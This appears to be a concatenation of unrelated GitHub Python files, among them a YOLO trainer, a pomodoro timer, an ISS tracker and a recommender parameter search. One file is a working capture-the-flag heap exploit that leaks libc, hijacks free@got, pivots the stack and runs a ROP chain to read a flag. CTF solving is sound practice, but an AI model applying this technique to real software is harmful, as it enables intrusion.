model = Model(inputs=inputs, outputs=yolo_outputs)
print(model.summary())
tf.keras.utils.plot_model(model,
to_file='yolov1.png',
show_shapes=True,
show_layer_names=True)
model.compile(loss=yolo_loss, optimizer='adam')
save_dir = 'checkpoints'
weights_path = os.path.join(save_dir, 'weights.hdf5')
checkpoint = ModelCheckpoint(weights_path, monitor='val_loss',
save_weights_only=True, save_best_only=True)
if not os.path.isdir(save_dir):
os.makedirs(save_dir)
if os.path.exists('checkpoints/weights.hdf5'):
model.load_weights('checkpoints/weights.hdf5', by_name=True)
else:
model.load_weights('tiny-yolov1.hdf5', by_name=True)
print('no train history')
early_stopping = EarlyStopping(
monitor='val_loss', min_delta=0, patience=15, verbose=1, mode='auto')
datasets_path = os.path.expanduser(datasets_path)
train_generator = SequenceData(
'train', datasets_path, input_shape, batch_size)
validation_generator = SequenceData(
'val', datasets_path, input_shape, batch_size)
model.fit_generator(
train_generator,
steps_per_epoch=len(train_generator),
epochs=30,
validation_data=validation_generator,
validation_steps=len(validation_generator),
# use_multiprocessing=True,
workers=4,
callbacks=[checkpoint, early_stopping]
)
model.save_weights('my-tiny-yolov1.hdf5')
if __name__ == '__main__':
_main()
| G0rav/yolov1 | yolov1_complete.py | yolov1_complete.py | py | 13,946 | python | en | code | 0 | github-code | 13 |
11527812303 | #install pillow package, pip3 install pillow
import sys
import os
from PIL import Image
input1=sys.argv[1]
output=sys.argv[2]
print(input1)
# create Path
if not (os.path.exists(output)):
os.makedirs('output')
#open and save files
for item in os.listdir(input1):
asd=os.path.splitext(item)[0]
image1=Image.open(f'{input1}{asd}.jpg')
image1.save(f'{output}{asd}.png','png')
print(image1)
| raghav914/Image-Converter | jpg.py | jpg.py | py | 410 | python | en | code | 0 | github-code | 13 |
25951363465 |
from tkinter import *
import time
import math
# ---------------------------- CONSTANTS ------------------------------- #
PINK = "#e2979c"
RED = "#e7305b"
GREEN = "#9bdeac"
YELLOW = "#f7f5dd"
FONT_NAME = "Courier"
WORK_MIN = 25
SHORT_BREAK_MIN = 5
LONG_BREAK_MIN = 20
reps = 0
timer = None
# ---------------------------- TIMER RESET ------------------------------- #
def reset_timer():
# stop timer
window.after_cancel(timer)
#reset checks
check_mark.config(text="")
#reset the text to Timer
title_label.config(text="Timer", fg=GREEN)
# set timer back to 00:00 or 25:00
canvas_5.itemconfig(timer_text, text="00:00")
#reset reps
global reps
reps = 0
# ---------------------------- TIMER MECHANISM ------------------------------- #
def start_timer():
global reps
reps += 1
work_sec = WORK_MIN * 60
short_break_sec = SHORT_BREAK_MIN * 60
long_break_sec = LONG_BREAK_MIN * 60
if reps == 8:
count_down (long_break_sec)
#long break
title_label.config(text="Break", fg=RED)
elif reps % 2 == 0:
count_down(short_break_sec)
#short break
title_label.config(text="Break", fg=PINK)
else:
count_down(work_sec)
#working
title_label.config(text="Work", fg=GREEN)
# ---------------------------- COUNTDOWN MECHANISM ------------------------------- #
def count_down(count):
#format count as 00:00
global reps
minutes_remaining = int(math.floor(count / 60))
seconds_remaining = count % 60
check_text="✔"
# if minutes_remaining < 1:
# minutes_remaining = "00"
if seconds_remaining == 0:
seconds_remaining = "00"
elif seconds_remaining < 10:
seconds_remaining = "0" + str(seconds_remaining)
canvas_5.itemconfig(timer_text, text=f"{minutes_remaining}:{seconds_remaining}")
if count > 0:
global timer
timer = window.after(1000, count_down, count - 1)
else:
start_timer()
if reps % 2 == 0:
marks = ""
for num in range(math.floor(reps/2)):
marks += check_text
check_mark.config(text=marks)
# ---------------------------- UI SETUP ------------------------------- #
# configuring the window
window = Tk()
window.title("Pomodoro")
window.config(padx=0, pady=0, bg=YELLOW)
canvas_1 = Canvas(width=100, height=100, bg=YELLOW, highlightthickness=0)
canvas_1.grid(column=0, row=0)
title_label = Label(text="Timer", fg=GREEN, bg=YELLOW, font=(FONT_NAME, 50))
title_label.grid(column=1, row=0)
canvas_3 = Canvas(width=100, height=100, bg=YELLOW, highlightthickness=0)
canvas_3.grid(column=2, row=0)
canvas_4 = Canvas(width=100, height=224, bg=YELLOW, highlightthickness=0)
canvas_4.grid(column=0, row=1)
#adding an image onto the canvas
canvas_5 = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)
tomato_img = PhotoImage(file="day28/tomato.png")
canvas_5.create_image(100, 112, image=tomato_img)
timer_text = canvas_5.create_text(100, 130, text="00:00", fill="white", font=(FONT_NAME, 35, "bold"))
canvas_5.grid(column=1, row=1)
canvas_6 = Canvas(width=100, height=224, bg=YELLOW, highlightthickness=0)
canvas_6.grid(column=2, row=1)
canvas_7 = Canvas(width=100, height=10, bg=YELLOW, highlightthickness=0)
canvas_7.grid(column=0, row=2)
start_button = Button(text="Start", command=start_timer)
start_button.grid(column=0, row=2)
canvas_8 = Canvas(width=200, height=20, bg=YELLOW, highlightthickness=0)
canvas_8.grid(column=1, row=2)
canvas_9 = Canvas(width=100, height=20, bg=YELLOW, highlightthickness=0)
canvas_9.grid(column=2, row=2)
reset_button = Button(text="Reset", command=reset_timer)
reset_button.grid(column=2, row=2)
canvas_10 = Canvas(width=100, height=20, bg=YELLOW, highlightthickness=0)
canvas_10.grid(column=0, row=3)
canvas_11 = Canvas(width=200, height=20, bg=YELLOW, highlightthickness=0)
canvas_11.grid(column=1, row=3)
check_mark = Label(fg=GREEN, bg=YELLOW)
check_mark.grid(column=1, row=3)
canvas_12 = Canvas(width=100, height=20, bg=YELLOW, highlightthickness=0)
canvas_12.grid(column=2, row=3)
canvas_13 = Canvas(width=100, height=30, bg=YELLOW, highlightthickness=0)
canvas_13.grid(column=0, row=4)
canvas_14 = Canvas(width=200, height=30, bg=YELLOW, highlightthickness=0)
canvas_14.grid(column=1, row=4)
canvas_15 = Canvas(width=100, height=30, bg=YELLOW, highlightthickness=0)
canvas_15.grid(column=2, row=4)
window.mainloop() | ckzard/100days | day28/main.py | main.py | py | 4,482 | python | en | code | 0 | github-code | 13 |
29696279244 | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:
s = set()
deleted = set()
cur = head
while (cur is not None):
if cur.val in s:
deleted.add(cur.val)
else:
s.add(cur.val)
cur = cur.next
head = ListNode(val=None, next=head)
cur_slow = head
cur_fast = head
while cur_fast.next is not None:
cur_fast = cur_fast.next
while cur_fast.val in deleted:
cur_fast = cur_fast.next
if cur_fast is None:
break
if cur_fast is None:
cur_slow.next = None
break
cur_slow.next = cur_fast
cur_slow = cur_slow.next
return head.next | xincheng-cao/loser_fruit | hash/82. Remove Duplicates from Sorted List II.py | 82. Remove Duplicates from Sorted List II.py | py | 992 | python | en | code | 0 | github-code | 13 |
73658168658 | from pwn import *
p = process("./faker", env={"LD_PRELOAD": "./libc.so.6"})
elf = ELF("faker")
libc = ELF("libc.so.6")
def new(size):
p.sendlineafter("> ", "1")
p.sendlineafter(":\n", str(size))
return int(p.recvregex("at index (\d+)")[0])
def edit(index, data):
p.sendlineafter("> ", "2")
p.sendlineafter(":\n", str(index))
p.sendafter(":\n", data)
def delete(index):
p.sendlineafter("> ", "3")
p.sendlineafter(":\n", str(index))
p.sendlineafter('size:\n','5')
p.sendafter('name:\n','flag\x00')
'''
Chunk 0 - 6, count = 7: size 0x70
tcache is full
'''
for i in range(7):
new(0x68)
delete(0)
new(0x68) # chunk 0
new(0x68) # chunk 1
delete(0) # fastbin -> 0x71 -> 0
delete(1) # fastbin -> 0x71 -> 0
edit(1, p64(0x6020bd)) # chunk[1]->fd = 0x6020bd
new(0x68) # chunk 0
new(0x68) # chunk 1
payload = b'AAA'
payload += p64(0) * 2
payload += p32(0x68) * 8 # size -> int
payload += p32(1) * 3 + p32(0) * 5
payload += p64(elf.got['free']) # ptr[0]
payload += p64(0x6020e0) # ptr[1] = &page_size
'''
ptr[0] = fee@got
ptr[1] = &page_size
'''
edit(1, payload) # edit the page_table
edit(0, p64(elf.plt['printf'])) # ptr[0] -> free@got -> printf@plt
new(0x68) # chunk 2
edit(3, "%19$p\n") # FSB
delete(3) # free(chunk[3]) -> %19$p -> printf("%19$p")
libc.address = int(p.recvline().strip(), 16) - libc.symbols['__libc_start_main'] - 231
log.info(f"LIBC: {hex(libc.address)}")
payload = p32(0x68) * 8 # size > int
payload += p32(1) * 3 + p32(0) * 5 # flags -> int
payload += p64(elf.got["free"]) # ptr[0] = free@got
payload += p64(0x6020e0) # ptr[1] = page_size
payload += p64(0x602138) # *ptr
edit(1, payload)
new(0x70) # 3
new(0x70) # 4
delete(2) # free(chunk2) -> printf(&chunk2)
heap_base = u64(p.recv(4).ljust(8, b"\x00")) - 0x14b0
log.info(f"HEAP: {hex(heap_base)}")
syscall = libc.address + 0x00000000000d2975
pop_rsi = libc.address + 0x0000000000023e6a
pop_rax = libc.address + 0x00000000000439c8
pop_rdx = libc.address + 0x0000000000001b96
pop_rdi = libc.address + 0x000000000002155f
edit(0, p64(libc.symbols["setcontext"] + 0x35))
'''
Perform stack pivot and oRW
0x7f12c88450a5 <setcontext+53>: mov rsp,QWORD PTR [rdi+0xa0]
0x7f12c88450ac <setcontext+60>: mov rbx,QWORD PTR [rdi+0x80]
0x7f12c88450b3 <setcontext+67>: mov rbp,QWORD PTR [rdi+0x78]
0x7f12c88450b7 <setcontext+71>: mov r12,QWORD PTR [rdi+0x48]
0x7f12c88450bb <setcontext+75>: mov r13,QWORD PTR [rdi+0x50]
0x7f12c88450bf <setcontext+79>: mov r14,QWORD PTR [rdi+0x58]
0x7f12c88450c3 <setcontext+83>: mov r15,QWORD PTR [rdi+0x60]
0x7f12c88450c7 <setcontext+87>: mov rcx,QWORD PTR [rdi+0xa8]
0x7f12c88450ce <setcontext+94>: push rcx
0x7f12c88450cf <setcontext+95>: mov rsi,QWORD PTR [rdi+0x70]
0x7f12c88450d3 <setcontext+99>: mov rdx,QWORD PTR [rdi+0x88]
0x7f12c88450da <setcontext+106>: mov rcx,QWORD PTR [rdi+0x98]
0x7f12c88450e1 <setcontext+113>: mov r8,QWORD PTR [rdi+0x28]
0x7f12c88450e5 <setcontext+117>: mov r9,QWORD PTR [rdi+0x30]
0x7f12c88450e9 <setcontext+121>: mov rdi,QWORD PTR [rdi+0x68]
0x7f12c88450ed <setcontext+125>: xor eax,eax
0x7f12c88450ef <setcontext+127>: ret
'''
payload = b''
payload += b'flag\x00\x00\x00\x00' + p64(0xffffffffffffff9c) # rdi + 0x60 --> r15, rdi
payload += p64(heap_base + 0x14b0) + p64(0) # rdi + 0x70 --> rsi, rbp
payload += p64(0) + p64(0) # rdi + 0x80 --> rbx, rdx
payload += p64(0) + p64(0) # rdi + 0x90 --> XXX, rcx
payload += p64(heap_base + 0x17d0 - 8) + p64(pop_rax) # rdi + 0xa0 --> rsp,
# Store the payload, one after another
edit(3, payload)
payload = p32(0xfff) * 8
payload += p32(1) * 5 + p32(0) * 3
payload += p64(elf.got["free"])
payload += p64(0x6020e0)
payload += p64(heap_base + 0x14b0 - 0x60) # otr[2]
edit(1, payload)
# openat(0, "flag", 0)
payload = p64(pop_rax)
payload += p64(257)
payload += p64(syscall)
payload += p64(pop_rax)
payload += p64(0)
payload += p64(pop_rdi)
payload += p64(3)
payload += p64(pop_rsi)
payload += p64(heap_base)
payload += p64(pop_rdx)
payload += p64(0x40)
payload += p64(syscall)
payload += p64(pop_rax)
payload += p64(1)
payload += p64(pop_rdi)
payload += p64(1)
payload += p64(pop_rsi)
payload += p64(heap_base)
payload += p64(pop_rdx)
payload += p64(0x40)
payload += p64(syscall)
edit(4, payload)
delete(2) # Stack Pivot
p.interactive()
| D4mianWayne/PwnLand | CTFs/3kCTF2020/faker/faker.py | faker.py | py | 4,332 | python | en | code | 43 | github-code | 13 |
24346068490 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import os
import pandas as pd
# In[3]:
# file paths
IMGFOLDER = 'myprac/'
COLORMASKFOLDER = 'myprac/color_masks/'
BIMASKFOLDER = 'myprac/bi_coded_masks/'
CSVFILE = 'myprac/bbox.csv'
IMGOUT = 'myprac/imgs/'
FINALMASKOUT = 'myprac/masks/'
# In[4]:
# setup
# current works best for BnW images
THRESHOLD = 225
MAXVALUES = 128
# In[ ]:
# label names
LABEL1 = 'margin'
LABEL2 = 'text'
LABEL3 = 'image_capital'
LABEL4 = 'noise'
LABEL5 = 'background'
# In[ ]:
# bib ext
# https://www.tutorialspoint.com/how-to-apply-a-mask-on-the-matrix-in-matplotlib-imshow
# https://matplotlib.org/3.5.0/gallery/images_contours_and_fields/image_masked.html
# https://stackoverflow.com/questions/56766307/plotting-with-numpy-masked-arrays
# https://stackoverflow.com/questions/31877353/overlay-an-image-segmentation-with-numpy-and-matplotlib
# https://matplotlib.org/stable/gallery/images_contours_and_fields/image_masked.html
# https://matplotlib.org/3.4.3/tutorials/intermediate/artists.html?highlight=layer%20image
# https://www.blog.pythonlibrary.org/2021/02/23/drawing-shapes-on-images-with-python-and-pillow/
# https://note.nkmk.me/en/python-pillow-composite/
| thebabellibrarybot/prep_fasterRCNN_anno | mask_config.py | mask_config.py | py | 1,216 | python | en | code | 1 | github-code | 13 |
31374392804 | # Takes a long string formatted as a repetition of [sender] => [receiver] £[amount] [datetime]
# and converts it into a list of tuples in the format [(sender, receiver, amount, datetime), ...].
def read_ledger(s):
l = []
if len(s) < 29:
return l #less than the minimum amount of characters returns an empty list
for i in s.split("\n"):
l.append(i.split()) #loop through a list of entries and then append the split list of each
for v in range(len(l)):
l[v].remove("=>") #remove excess character
l[v][2] = int(l[v][2][1:]) #turn the amount part of the entry into an integer
return [tuple(x) for x in l] #list comprehension to turn each entry into a tuple
| JoFGD/ReadLedger | read_ledger.py | read_ledger.py | py | 710 | python | en | code | 0 | github-code | 13 |
15726670967 | def collatz(number):
if number%2 == 0:
result = number // 2
print(str(number) + ' // 2 = ' + str(result))
else:
result = 3 * number + 1
print('3 * ' + str(number) + ' + 1 = ' + str(result))
print('Please! Enter number: ')
collatz(int(input()))
| tmhung-nt/PythonPractise | Tien/Chapter3/The_Collatz_Sequence.py | The_Collatz_Sequence.py | py | 262 | python | en | code | 0 | github-code | 13 |
26811824623 | import random
import turtle
from turtle import Turtle, Screen
tim = Turtle()
turtle.colormode(255)
def random_color():
r = random.randint(0, 255)
g = random.randint(0, 255)
b = random.randint(0, 255)
colors = (r, g, b)
return colors
tim.speed("fast")
tim.pensize(10)
directions = [0, 90, 180, 270]
for _ in range(80):
tim.color(random_color())
tim.forward(30)
# setheading - set the turtle according to the angle
tim.setheading(random.choice(directions))
screen = Screen()
screen.exitonclick()
| nilayhangarge/100-Days-of-Code-Challenge | Project/Day-18 Turtle Graphics/Day-18 Turtle Challenges/Version 18.4/main.py | main.py | py | 537 | python | en | code | 0 | github-code | 13 |
33301433385 | from django.shortcuts import render
from django.http import HttpResponse
from app.models import *
# Create your views here.
def form(request):
if request.method=='POST':
username=request.POST['un']
password=request.POST['pw']
print(username)
print(password)
return HttpResponse('data is inserted')
return render (request,'form.html')
def data(request):
if request.method=='POST':
topic=request.POST['topic']
TO=Topic.objects.get_or_create(topic_name=topic)[0]
TO.save()
return HttpResponse('data is inserted')
return render(request,'data.html')
def Webpage(request):
LTO=Topic.objects.all()
d={'LTO':LTO}
if request.method=='POST':
topic=request.POST['topic']
name=request.POST['name']
url=request.POST['Url']
TO=Topic.objects.get(topic_name=topic)
WO=WebPage.objects.get_or_create(topic_name=TO,name=name,url=url)[0]
WO.save()
return HttpResponse('data is inserted')
return render(request,'Webpage.html',d)
def AcessRecords(request):
if request.method=='POST':
n=request.POST['name']
date=request.POST['date']
author=request.POST['author']
WO=WebPage.objects.get(name=n)
AO=AcessRecord.objects.get_or_create(name=WO,date=date,author=author)[0]
AO.save()
return HttpResponse('data is inserted')
return render(request,'AcessRecord.html')
def retrieve_webpage(request):
LTO=Topic.objects.all()
d={'LTO':LTO}
if request.method=='POST':
msts=request.POST.getlist('topic')
rwos=WebPage.objects.none()
for i in msts:
rwos=rwos|WebPage.objects.filter(topic_name=i)
d1={'rwos':rwos}
return render(request,'display_webpage.html',d1)
return render(request,'Webpage.html',d)
def checkbox(request):
LTO=Topic.objects.all()
d={'LTO':LTO}
return render(request,'checkbox.html',d)
| oppalaa/sample | app/views.py | views.py | py | 1,999 | python | en | code | 0 | github-code | 13 |
3645175993 | import argparse
from hvarma import Data, ArmaParam, run_model, write_results, plot_hvratio
def select_parameters_from_args(args):
""" Filter out ArmaParam attributes from commandline arguments """
args_dict = {}
for arg in vars(args):
if arg in ArmaParam.get_fields_list():
if getattr(args, arg) is not None:
args_dict[arg] = getattr(args, arg)
return args_dict
def write_frequencies_in_file(param, results):
""" Write the frequency results in a file """
from hvarma.write_output import generate_filename
filename = generate_filename(param.output_dir, results.station,
param.model_order, results.num_windows)
pos_freq, pos_err, neg_freq, neg_err = results.get_frequency(param.freq_conf)
with open(filename + '.res', 'w') as fres:
fres.write('POSITIVE {:.6f} error {:.6f} Hz '
'NEGATIVE {:.6f} error {:.6f} Hz\n'
.format(pos_freq, pos_err, neg_freq, neg_err))
def main(args):
data = Data.from_sac(Z_fname=args.Z_fname,
N_fname=args.N_fname,
E_fname=args.E_fname)
if args.args_file is not None:
param = ArmaParam.from_file(args.args_file)
else:
param = ArmaParam()
args_dict = select_parameters_from_args(args)
param = param.update(args_dict)
if not args.silent:
print('Data read correctly')
results = run_model(data, param, verbose=not args.silent)
write_results(data, param, results)
plot_hvratio(param, results, format='png')
write_frequencies_in_file(param, results)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('Z_fname', type=str, help="SAC data in direction Z")
parser.add_argument('N_fname', type=str, help="SAC data in direction N")
parser.add_argument('E_fname', type=str, help="SAC data in direction E")
parser.add_argument('--model_order', type=int, help="HVARMA model order")
parser.add_argument('--output_dir', type=str, help="Directory in which to store output")
parser.add_argument('--max_windows', type=int, help="Maximum number of windows to explore within data.")
parser.add_argument('--window_size', type=int, help="Size of each individual window.")
parser.add_argument('--overlap', type=int, help="Overlap between individual windows.")
parser.add_argument('--args_file', type=str, help="File with all the default arguments.", default=None)
parser.add_argument('--freq_points', type=int, help="Number of frequency points to "
"calculate between neg_freq and pos_freq")
parser.add_argument('--freq_conf', type=float, help='Frequency confidence interval.')
parser.add_argument('--silent', help="No output to stdout", action='store_false', default=False)
main(parser.parse_args())
| asleix/hvarma | examples/run.py | run.py | py | 2,921 | python | en | code | 0 | github-code | 13 |
71202979859 | #!/usr/bin/env python
import sys
from os.path import expanduser
import os
sys.path.append(os.path.join(expanduser("~"), "src/anki"))
from anki import Collection
from sqlite3 import OperationalError
from termcolor import colored
from argparse import ArgumentParser
import re
import random
import sys
parser = ArgumentParser()
parser.add_argument('-c', '--collection', required=True,
help='path to the anki database')
parser.add_argument('-d', '--deck', required=True,
help='name of the Anki deck to use')
parser.add_argument('-s', '--show-answer', action='store_true',
help='show the answer in addition to the question')
parser.add_argument('--days', required=False,
default=1,
help='number of days to look forward')
args = parser.parse_args()
try:
col = Collection(args.collection)
except OperationalError:
print(colored("Anki Deck locked", "magenta"))
sys.exit(0)
except Exception as e:
print(colored("Error loading collection", "magenta"))
sys.exit(0)
deck = col.decks.byName(args.deck)
if not deck:
print(colored("Deck {} not found".format(args.deck), "magenta"))
sys.exit(0)
cards = col.db.list(
"select id from cards where did={} and due between {} and {}".format(
deck['id'], col.sched.today, col.sched.today + int(args.days)))
qas = col.renderQA(cards)
qa = random.choice(qas)
question = qa['q'].encode('utf-8')
answer = qa['a'].encode('utf-8')
question = re.sub('\[\[.*?\]\]', '', question)
answer = re.sub('.*answer>', '', answer, flags=re.DOTALL)
print(colored(question.strip(), "yellow", attrs=['dark'])),
if args.show_answer:
print(colored(answer.strip(), "grey", attrs=['dark']))
with open(os.path.join(expanduser("~"), ".anki-answer"), "wb") as f:
f.write(answer.strip())
| jarv/anki-prompt | anki-prompt.py | anki-prompt.py | py | 1,853 | python | en | code | 0 | github-code | 13 |
17700482583 | # we use googletrans API new name is google_trans_new
# pip command ; pip install google_trans_new
from google_trans_new import google_translator
import streamlit as st
translator = google_translator()
st.title("Language Translator")
text = st.text_input("Enter a text")
translate = translator.translate(text, lang_tgt='fr') # fr means french
st.write(translate)
# Since we are using the streamlit library here, we need to run this code using the streamlit run file name.py command in your terminal.
| cinalimaster/ariftanis | Python/project_library/interactive_language_translator.py | interactive_language_translator.py | py | 502 | python | en | code | 0 | github-code | 13 |
2295560053 | import datetime
import json
import math
import threading
import tkinter
import urllib.request
import requests
from PIL import Image, ImageTk
prev_lat, prev_long, prev_time, prev_speed = 0, 0, 0, 0
def distance_on_unit_sphere(lat1, long1, lat2, long2):
# Convert latitude and longitude to
# spherical coordinates in radians.
degrees_to_radians = math.pi / 180.0
# phi = 90 - latitude
phi1 = (90.0 - lat1) * degrees_to_radians
phi2 = (90.0 - lat2) * degrees_to_radians
# theta = longitude
theta1 = long1 * degrees_to_radians
theta2 = long2 * degrees_to_radians
# Compute spherical distance from spherical coordinates.
# For two locations in spherical coordinates
# (1, theta, phi) and (1, theta', phi')
# cosine( arc length ) =
# sin phi sin phi' cos(theta-theta') + cos phi cos phi'
# distance = rho * arc length
cos = math.sin(phi1) * math.sin(phi2) * math.cos(theta1 - theta2) + math.cos(
phi1
) * math.cos(phi2)
# Remember to multiply arc by the radius of the earth
# in your favorite set of units to get length.
return math.acos(cos)
def start():
top = tkinter.Tk()
top.title("ISS Tracker")
def counter_label(label):
def count():
global prev_lat
global prev_long
global prev_time
global prev_speed
req = requests.get("http://api.open-notify.org/iss-now.json")
obj = req.json()
lat = float(obj["iss_position"]["latitude"])
long = float(obj["iss_position"]["longitude"])
timestamp = int(obj["timestamp"])
time_change = timestamp - prev_time
distance_moved = (
distance_on_unit_sphere(prev_lat, prev_long, lat, long) * 4164
)
speed = distance_moved * 3600
if time_change != 1 or distance_moved > 5:
label.config(
text="Estimated speed: {} mph\nLatitude: {}\nLongitude: {}".format(
prev_speed, lat, long
)
)
else:
label.config(
text="Estimated speed: {} mph\nLatitude: {}\nLongitude: {}".format(
speed, lat, long
)
)
prev_speed = speed
prev_lat, prev_long, prev_time = lat, long, timestamp
label.after(1000, count)
count()
title = tkinter.Label(
top, height=1, width=50, font=("Arial", 25, "bold"), text="ISS Tracker"
)
title.pack()
label = tkinter.Label(top, height=3, width=50, font=("Arial", 20))
label.pack()
counter_label(label)
top.mainloop()
| bsoyka/iss-tracker | iss_tracker/__init__.py | __init__.py | py | 2,745 | python | en | code | 3 | github-code | 13 |
17930590562 | from marshmallow import fields, pre_load
from .flapp.extension import db, ma
from .model.ublog import Note, Person
from .model.library import Book, Quote
# Custom validator
def must_not_be_blank(data):
if not data:
raise ValidationError("Data not provided.")
class NoteSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Note
load_instance = True
sqla_session = db.session
include_fk = True
class PersonSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Person
load_instance = True
sqla_session = db.session
include_relationships = True
# https://marshmallow.readthedocs.io/en/stable/marshmallow.fields.html#marshmallow.fields.Nested
notes = fields.Nested(NoteSchema, many=True)
books = ma.auto_field()
formatted_name = fields.Method("format_name", dump_only=True)
def format_name(self, person):
return f"{person.lname}, {person.fname}"
class ShipmentSchema(ma.Schema):
class Meta:
fields = (
"id",
"item",
"description",
"status",
"tracking_number",
"current_location",
"source",
"destination",
"description",
"arrival",
)
class BookSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Book
include_fk = True
class QuoteSchema(ma.Schema):
id = fields.Int(dump_only=True)
author = fields.Nested(PersonSchema, validate=must_not_be_blank)
quote_text = fields.Str(required=True, validate=must_not_be_blank)
posted_at = fields.DateTime(dump_only=True)
# Allow client to pass author's full name in request body
# e.g. {"author': 'Tim Peters"} rather than {"first": "Tim", "last": "Peters"}
@pre_load
def process_author(self, data, **kwargs):
author_name = data.get("author")
if author_name:
first, last = author_name.split(" ")
author_dict = dict(fname=first, lname=last)
else:
author_dict = {}
data["author"] = author_dict
return data
| thinknot/connx-alembic | src/schema.py | schema.py | py | 2,130 | python | en | code | 0 | github-code | 13 |
3108184746 | """
The program receives from the USER a STRING
and returns (ignoring spaces and punctuation marks),
whether or not it is a PALINDROME.
"""
# START Definition of FUNCTION
def checkWord(string):
string = string.upper()
index_sx = 0 # left index
index_dx = len(string)-1 # right index
check = 0
while index_sx < index_dx:
# CHECK characters
if ("A" <= string[index_sx] <= "Z" or "0" <= string[index_sx] <= "9") and \
("A" <= string[index_dx] <= "Z" or "0" <= string[index_dx] <= "9"):
check += 1
if string[index_sx] != string[index_dx]:
return "IS NOT a PALINDROME."
index_sx += 1 # increasing left index
index_dx -= 1 # decreasing right index
elif ("A" <= string[index_sx] <= "Z" or "0" <= string[index_sx] <= "9") and \
not("A" <= string[index_dx] <= "Z" or "0" <= string[index_dx] <= "9"):
index_dx -= 1 # decreasing only right index
elif not ("A" <= string[index_sx] <= "Z" or "0" <= string[index_sx] <= "9") and \
("A" <= string[index_dx] <= "Z" or "0" <= string[index_dx] <= "9"):
index_sx += 1 # increasing left index
else:
index_sx += 1 # increasing left index
index_dx -= 1 # decreasing right index
if check > 0:
return "IS a PALINDROME."
else:
return"IS NOT a CHARACTER STRING."
# END Definition of FUNCTION
# Acquisition and Control of the DATA entered by the USER
word = input("Enter the STRING: ")
# Evaluation if STRING is a PALINDROME
palindrome = checkWord(word)
# Displaying the RESULT
print("\"" + word.upper() + "\" (ignoring spaces and punctuation marks) " + palindrome)
| aleattene/python-workbook | chap_03/exe_076_multiple_word_palindromes.py | exe_076_multiple_word_palindromes.py | py | 1,857 | python | en | code | 1 | github-code | 13 |
38259646951 | import tensorflow as tf
node1 = tf.constant(3.0, tf.float32)
node2 = tf.constant(4.0)
node3 = tf.add(node1, node2)
sess = tf.Session()
a = tf.placeholder(tf.float32)
b = tf.placeholder(tf.float32)
adder_node = a + b
# feed_dict >> placeholder 에 반드시 따라온다
# 텐서머신의 그래프 역할을 하는듯? 함수같이?
print(sess.run(adder_node, feed_dict = {a:3, b:4.5}))
print(sess.run(adder_node, feed_dict = {a:[1,3], b:[3,4]}))
add_and_triple = adder_node * 3
print(sess.run(add_and_triple, feed_dict = {a:4, b:2}))
| dongjaeseo/study | tf114/tf04_1_placeholder.py | tf04_1_placeholder.py | py | 541 | python | en | code | 2 | github-code | 13 |
29730853815 | #!/bin/python3
# -*- coding: utf-8 -*-
"""Parameter search (2020 Line recruit test)
This is code for 2020 line recruit test problem B.
Author: Bae Jiun, Maybe
"""
from typing import Tuple
import sys
import argparse
from multiprocessing import Pool, cpu_count
from itertools import product
from pathlib import Path
import json
import numpy as np
sys.path.append(str(Path(__file__).parent.parent.absolute()))
from lib import criterion, data, seed
from lib.recommender import Recommender
# Using as global constant variable
param_space = None
train, test = None, None
test_header = None
critic = None
def runner(args: argparse.Namespace) \
-> Tuple[argparse.Namespace, float]:
global train, test, test_header, critic
# Fit model, using train data
model = Recommender(factors=args.factor, epochs=args.epoch,
mean=args.mean, derivation=args.dev,
lr=args.lr, reg=args.reg)
model.fit(train[:, :2], train[:, 2])
# Predict by test data and calculate error
predictions = model.predict(test[:, :2])
error = critic(predictions, test[:, 2])
print(f'RMSE: {error}')
# Save predictions
result = test.copy()
result[:, 2] = predictions
data.to_csv(args.result, result, header=test_header)
return args, error
def wrapper(*args) \
-> Tuple[argparse.Namespace, float]:
param = dict(zip(param_space.keys(), *args))
param['result'] = str(result_prefix.joinpath(f"{'-'.join(map(str, param.values()))}.csv"))
args = argparse.Namespace(**param)
print(f'Testing param as {args}')
return runner(args)
def main(args: argparse.Namespace):
global train, test, test_header
# Reproducible (Important)
# An experiment that can not be reproduced can not make any conclusions.
# So fix random seed before anything else.
seed(args.seed)
# Load dataset
# Provides two dataset loading methods
# - Load from whole csv and split train, test by condition (slow)
# - Load each train, test csv (faster)
# (Using scripts/split.py to split train, test by condition)
if args.dataset:
dataset = data.Dataset(args.dataset)
train, test = dataset.split_train_test(args.mode)
test_header = dataset.rating_headers
else:
train, train_header = data.read_csv(args.train)
test, test_header = data.read_csv(args.test)
# Find param in search space
params = list(product(*param_space.values()))
if args.size:
indexes = np.random.choice(len(params), args.size, replace=False)
params = [params[i] for i in indexes]
print(f'Search space: {len(params)}')
print(f'Param: {param_space}')
with Pool(args.cpu or cpu_count()) as pool:
results = pool.map(wrapper, params)
best, *_ = sorted(results, key=lambda x: x[1])
print(f'Best RMSE: {best[1]}')
print(f'param: {best[0]}')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# Provide single csv file and split automatically
parser.add_argument("--dataset", type=str, default='', required=False,
help="Dataset path")
parser.add_argument("--mode", type=str, default='train', choices=['train', 'test', 'tiny'],
help="Dataset load mode")
# Provide each train, test dataset
parser.add_argument("--train", type=str, default='', required=False,
help="Train dataset directory path")
parser.add_argument("--test", type=str, default='', required=False,
help="Test dataset directory path")
parser.add_argument("--search", type=str, default='./data/search.json', required=True,
help="Path to search parameters")
parser.add_argument("--result", type=str, default='./results', required=False,
help="Result directory path")
parser.add_argument("--cpu", type=int, default=0, required=False,
help="# of processors to use")
parser.add_argument("--size", type=int, default=0, required=False,
help="Size of search space")
parser.add_argument('-s', '--seed', required=False,
default=42,
help="The answer to life the universe and everything")
parser.add_argument('--criterion', type=str, default='RMSE', choices=['RMSE'],
help="The answer to life the universe and everything")
default_args = parser.parse_args()
with open(default_args.search) as f:
param_space = json.load(f)
result_prefix = Path(default_args.result)
result_prefix.mkdir(exist_ok=True, parents=True)
# Set criterion as RMSE
critic = criterion.get(default_args.criterion)()
main(default_args)
| leejseo/2020-line-recruit | scripts/parameter_search.py | parameter_search.py | py | 4,807 | python | en | code | 0 | github-code | 13 |
4791896088 | #!/usr/bin/python
